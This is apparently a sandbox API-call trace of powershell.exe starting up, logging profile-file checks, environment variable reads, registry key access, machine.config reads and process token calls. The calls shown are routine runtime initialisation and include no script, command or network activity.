	[0098.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0098.792] SetErrorMode (uMode=0x1) returned 0x1
	[0098.792] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc40 | out: lpFileInformation=0x16dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0098.792] SetErrorMode (uMode=0x1) returned 0x1
	[0098.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0098.792] SetErrorMode (uMode=0x1) returned 0x1
	[0098.792] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dc40 | out: lpFileInformation=0x16dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0098.793] SetErrorMode (uMode=0x1) returned 0x1
	[0098.795] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.795] CoTaskMemFree (pv=0x3083f0) 
	[0098.796] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.796] CoTaskMemFree (pv=0x3083f0) 
	[0098.798] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.798] CoTaskMemFree (pv=0x3083f0) 
	[0098.801] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.801] CoTaskMemFree (pv=0x3083f0) 
	[0098.806] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.806] CoTaskMemFree (pv=0x3083f0) 
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a4
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8
	[0098.808] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x30c
	[0098.809] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0098.809] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0098.811] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.811] CoTaskMemFree (pv=0x3083f0) 
	[0098.813] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0098.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16de20 | out: lpMode=0x16de20) returned 1
	[0098.891] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.891] CoTaskMemFree (pv=0x3083f0) 
	[0098.894] SetEvent (hEvent=0x37c) returned 1
	[0098.895] SetEvent (hEvent=0x394) returned 1
	[0098.895] SetEvent (hEvent=0x398) returned 1
	[0098.895] SetEvent (hEvent=0x3b8) returned 1
	[0098.895] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0098.897] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.897] CoTaskMemFree (pv=0x3083f0) 
	[0098.898] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db78 | out: phkResult=0x16db78*=0x340) returned 0x0
	[0098.898] RegQueryValueExW (in: hKey=0x340, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16dafc, lpData=0x0, lpcbData=0x16daf8*=0x0 | out: lpType=0x16dafc*=0x0, lpData=0x0, lpcbData=0x16daf8*=0x0) returned 0x2

Thread:
	id = 86
	os_tid = 0xa04


Thread:
	id = 87
	os_tid = 0xa08


Thread:
	id = 88
	os_tid = 0xa14


Thread:
	id = 89
	os_tid = 0xaa4


Thread:
	id = 90
	os_tid = 0x5e0

	[0084.268] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0091.090] LocalFree (hMem=0x257170) returned 0x0
	[0091.091] CloseHandle (hObject=0x324) returned 1
	[0091.091] CloseHandle (hObject=0x13) returned 1
	[0091.091] CloseHandle (hObject=0xf) returned 1
	[0091.092] RegCloseKey (hKey=0x310) returned 0x0
	[0091.092] RegCloseKey (hKey=0x30c) returned 0x0
	[0091.092] RegCloseKey (hKey=0x308) returned 0x0
	[0091.092] LocalFree (hMem=0x257140) returned 0x0
	[0091.093] RegCloseKey (hKey=0x334) returned 0x0
	[0093.807] RegCloseKey (hKey=0x338) returned 0x0
	[0095.866] RegCloseKey (hKey=0x38c) returned 0x0
	[0095.866] RegCloseKey (hKey=0x388) returned 0x0
	[0095.866] RegCloseKey (hKey=0x384) returned 0x0
	[0095.867] RegCloseKey (hKey=0x380) returned 0x0
	[0095.867] RegCloseKey (hKey=0x358) returned 0x0
	[0095.867] RegCloseKey (hKey=0x3b4) returned 0x0
	[0095.867] RegCloseKey (hKey=0x3b0) returned 0x0
	[0095.868] RegCloseKey (hKey=0x378) returned 0x0
	[0095.868] RegCloseKey (hKey=0x374) returned 0x0
	[0095.869] RegCloseKey (hKey=0x370) returned 0x0
	[0095.869] RegCloseKey (hKey=0x36c) returned 0x0
	[0095.869] RegCloseKey (hKey=0x368) returned 0x0
	[0095.869] RegCloseKey (hKey=0x364) returned 0x0
	[0095.870] RegCloseKey (hKey=0x360) returned 0x0
	[0095.870] RegCloseKey (hKey=0x35c) returned 0x0
	[0095.870] RegCloseKey (hKey=0x3ac) returned 0x0
	[0095.871] RegCloseKey (hKey=0x34c) returned 0x0
	[0095.871] RegCloseKey (hKey=0x348) returned 0x0
	[0095.871] RegCloseKey (hKey=0x344) returned 0x0
	[0095.871] RegCloseKey (hKey=0x340) returned 0x0
	[0095.872] RegCloseKey (hKey=0x33c) returned 0x0
	[0095.872] RegCloseKey (hKey=0x324) returned 0x0
	[0095.873] RegCloseKey (hKey=0x310) returned 0x0
	[0095.873] RegCloseKey (hKey=0x30c) returned 0x0
	[0095.873] RegCloseKey (hKey=0x3a8) returned 0x0
	[0095.873] RegCloseKey (hKey=0x334) returned 0x0
	[0095.874] RegCloseKey (hKey=0x338) returned 0x0
	[0095.874] RegCloseKey (hKey=0x3a4) returned 0x0
	[0095.874] RegCloseKey (hKey=0x3a0) returned 0x0
	[0095.874] RegCloseKey (hKey=0x37c) returned 0x0
	[0095.875] RegCloseKey (hKey=0x3b8) returned 0x0
	[0095.875] RegCloseKey (hKey=0x398) returned 0x0
	[0095.876] RegCloseKey (hKey=0x394) returned 0x0
	[0095.876] RegCloseKey (hKey=0x390) returned 0x0
	[0109.447] RegCloseKey (hKey=0x340) returned 0x0

Thread:
	id = 105
	os_tid = 0x5f4

	[0098.972] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0098.977] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0098.983] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.983] CoTaskMemFree (pv=0x3083f0) 
	[0098.985] VirtualQuery (in: lpAddress=0x1c70d880, lpBuffer=0x1c70e740, dwLength=0x30 | out: lpBuffer=0x1c70e740*(BaseAddress=0x1c70d000, AllocationBase=0x1bd80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0098.990] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.990] CoTaskMemFree (pv=0x3083f0) 
	[0098.993] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.993] CoTaskMemFree (pv=0x3083f0) 
	[0098.997] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0098.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0098.997] CoTaskMemFree (pv=0x3083f0) 
	[0099.189] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.190] CoTaskMemFree (pv=0x3083f0) 
	[0099.192] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.192] CoTaskMemFree (pv=0x3083f0) 
	[0099.194] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.194] CoTaskMemFree (pv=0x3083f0) 
	[0099.199] VirtualQuery (in: lpAddress=0x1c70db30, lpBuffer=0x1c70e9f0, dwLength=0x30 | out: lpBuffer=0x1c70e9f0*(BaseAddress=0x1c70d000, AllocationBase=0x1bd80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0099.200] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.200] CoTaskMemFree (pv=0x3083f0) 
	[0099.203] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.203] CoTaskMemFree (pv=0x3083f0) 
	[0099.203] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.203] CoTaskMemFree (pv=0x3083f0) 
	[0099.205] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.205] CoTaskMemFree (pv=0x3083f0) 
	[0099.210] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.210] CoTaskMemFree (pv=0x3083f0) 
	[0099.446] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.446] CoTaskMemFree (pv=0x3083f0) 
	[0099.449] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.449] CoTaskMemFree (pv=0x3083f0) 
	[0099.450] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.450] CoTaskMemFree (pv=0x3083f0) 
	[0099.519] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.519] CoTaskMemFree (pv=0x3083f0) 
	[0099.520] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.520] CoTaskMemFree (pv=0x3083f0) 
	[0099.522] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.522] CoTaskMemFree (pv=0x3083f0) 
	[0099.523] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.523] CoTaskMemFree (pv=0x3083f0) 
	[0099.542] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.543] CoTaskMemFree (pv=0x3083f0) 
	[0099.686] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0099.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.686] CoTaskMemFree (pv=0x3083f0) 
	[0100.059] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0100.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0100.059] CoTaskMemFree (pv=0x3083f0) 
	[0100.356] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0100.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0100.356] CoTaskMemFree (pv=0x3083f0) 
	[0100.360] CoTaskMemAlloc (cb=0x104) returned 0x3083f0
	[0100.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3083f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0100.360] CoTaskMemFree (pv=0x3083f0) 
	[0115.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c70d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0115.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c70d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0115.862] CoTaskMemAlloc (cb=0x20c) returned 0x292c60
	[0115.862] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x292c60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0115.862] CoTaskMemFree (pv=0x292c60) 
	[0115.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c70d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0116.006] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.006] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d4c8 | out: TokenHandle=0x1c70d4c8*=0x1cc) returned 1
	[0116.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c70d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0116.125] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c70d570 | out: lpFileInformation=0x1c70d570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0116.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c70d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0116.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c70d520 | out: lpFileInformation=0x1c70d520*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0116.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c70cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0116.129] SetErrorMode (uMode=0x1) returned 0x1
	[0116.129] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d0
	[0116.129] GetFileType (hFile=0x1d0) returned 0x1
	[0116.129] SetErrorMode (uMode=0x1) returned 0x1
	[0116.129] GetFileType (hFile=0x1d0) returned 0x1
	[0116.131] GetFileSize (in: hFile=0x1d0, lpFileSizeHigh=0x1c70d518 | out: lpFileSizeHigh=0x1c70d518*=0x0) returned 0x622a
	[0116.131] ReadFile (in: hFile=0x1d0, lpBuffer=0x3007758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c70d438, lpOverlapped=0x0 | out: lpBuffer=0x3007758*, lpNumberOfBytesRead=0x1c70d438*=0x1000, lpOverlapped=0x0) returned 1
	[0116.475] ReadFile (in: hFile=0x1d0, lpBuffer=0x3007758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c70cf68, lpOverlapped=0x0 | out: lpBuffer=0x3007758*, lpNumberOfBytesRead=0x1c70cf68*=0x1000, lpOverlapped=0x0) returned 1
	[0116.476] ReadFile (in: hFile=0x1d0, lpBuffer=0x3007758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c70cf68, lpOverlapped=0x0 | out: lpBuffer=0x3007758*, lpNumberOfBytesRead=0x1c70cf68*=0x1000, lpOverlapped=0x0) returned 1
	[0116.477] ReadFile (in: hFile=0x1d0, lpBuffer=0x3007758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c70cf68, lpOverlapped=0x0 | out: lpBuffer=0x3007758*, lpNumberOfBytesRead=0x1c70cf68*=0x1000, lpOverlapped=0x0) returned 1
	[0116.477] ReadFile (in: hFile=0x1d0, lpBuffer=0x3007758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c70cf68, lpOverlapped=0x0 | out: lpBuffer=0x3007758*, lpNumberOfBytesRead=0x1c70cf68*=0x1000, lpOverlapped=0x0) returned 1
	[0116.480] ReadFile (in: hFile=0x1d0, lpBuffer=0x3007758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c70d0a8, lpOverlapped=0x0 | out: lpBuffer=0x3007758*, lpNumberOfBytesRead=0x1c70d0a8*=0x1000, lpOverlapped=0x0) returned 1
	[0116.481] ReadFile (in: hFile=0x1d0, lpBuffer=0x3007758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c70cf28, lpOverlapped=0x0 | out: lpBuffer=0x3007758*, lpNumberOfBytesRead=0x1c70cf28*=0x22a, lpOverlapped=0x0) returned 1
	[0116.482] ReadFile (in: hFile=0x1d0, lpBuffer=0x3007758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c70cfc8, lpOverlapped=0x0 | out: lpBuffer=0x3007758*, lpNumberOfBytesRead=0x1c70cfc8*=0x0, lpOverlapped=0x0) returned 1
	[0116.482] CloseHandle (hObject=0x1d0) returned 1
	[0116.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c70d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0116.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c70d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0116.483] CoTaskMemAlloc (cb=0x20c) returned 0x292c60
	[0116.483] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x292c60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0116.484] CoTaskMemFree (pv=0x292c60) 
	[0116.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c70d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0116.484] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.484] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d728 | out: TokenHandle=0x1c70d728*=0x1d0) returned 1
	[0116.485] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.485] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d728 | out: TokenHandle=0x1c70d728*=0x1d4) returned 1
	[0116.486] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.486] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d4c8 | out: TokenHandle=0x1c70d4c8*=0x364) returned 1
	[0116.487] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c70d570 | out: lpFileInformation=0x1c70d570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0116.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c70d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0116.488] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c70d520 | out: lpFileInformation=0x1c70d520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0116.488] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.488] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d728 | out: TokenHandle=0x1c70d728*=0x368) returned 1
	[0116.489] GetCurrentProcess () returned 0xffffffffffffffff
	[0116.489] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70d728 | out: TokenHandle=0x1c70d728*=0x36c) returned 1
	[0116.506] GetCurrentProcess () returned 0xffffffffffffffff
